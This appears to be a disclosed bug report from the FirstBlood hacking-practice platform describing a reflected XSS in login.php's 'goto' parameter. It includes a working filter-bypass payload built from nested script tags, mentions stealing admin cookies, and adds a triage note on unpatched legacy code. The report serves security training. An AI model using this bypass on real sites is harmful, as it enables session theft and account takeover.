FirstBlood-#420Reflective XSS on login.php
This issue was discovered on FirstBlood v2.0.0 (issues patched)



On 2021-10-25, shivam18u Level 3 reported:

Hi Sean,

I found a reflective XSS on login.php page using a hidden parameter goto.

By visiting the link https://20380f62fd41-shivam18u.a.firstbloodhackers.com/login.php?goto=hello%22%3E%3Cscr%3Cscript%3Eipt%3Ealealertrt`1`%3C/scr%3C/script%3Eipt%3E, the xss can be triggered.

Payload: hello%22%3E%3Cscr%3Cscript%3Eipt%3Ealealertrt`1`%3C/scr%3C/script%3Eipt%3E

By using a script stored on a remote server, you can bypass the filters.

This can be used to steal admin's cookies.

Have a nice day!

P3 Medium

Endpoint: /login.php

Parameter: goto

Payload: hello%22%3E%3Cscr%3Cscript%3Eipt%3Ealealertrt`1`%3C/scr%3C/script%3Eipt%3E


FirstBlood ID: 26
Vulnerability Type: Reflective XSS

The developers thought they had fixed ?goto= when reflected in an input tag on login.php from a similar bug (ID 39), but because this endpoint uses legacy code their changes were not applied here and thus the XSS was forgotten.